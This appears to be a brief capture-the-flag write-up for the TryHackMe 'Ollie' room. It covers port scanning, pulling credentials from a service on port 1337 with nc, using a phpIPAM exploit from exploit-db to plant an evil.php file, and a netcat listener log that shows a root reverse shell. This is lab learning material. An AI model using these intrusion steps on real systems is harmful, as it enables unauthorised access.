To begin, perform a comprehensive scan of the machine's open ports using both rustscan and nmap. This dual approach ensures a thorough examination of the network, providing a more detailed understanding of the available services and potential vulnerabilities.
Looks like I found 3 open ports. I begin to enumerate the 1337 port. Try to establish a connection with nc command and you will get website credentials.
nc $IP 1337
Use this credentials to login and now let's enumerate the website. To obtain a reverse shell it is quite simple. I see that it is about phpIPAM, so search in exploit-db.
I found an python script and you will add an evil.php file.
┌──(kali㉿kali)-[~/Documents/TryHackMe/ollie]
└─$ rlwrap nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.8.113.25] from (UNKNOWN) [10.10.97.198] 37274
bash: cannot set terminal process group (4102): Inappropriate ioctl for device
bash: no job control in this shell
root@hackerdog:/# whoami
whoami
root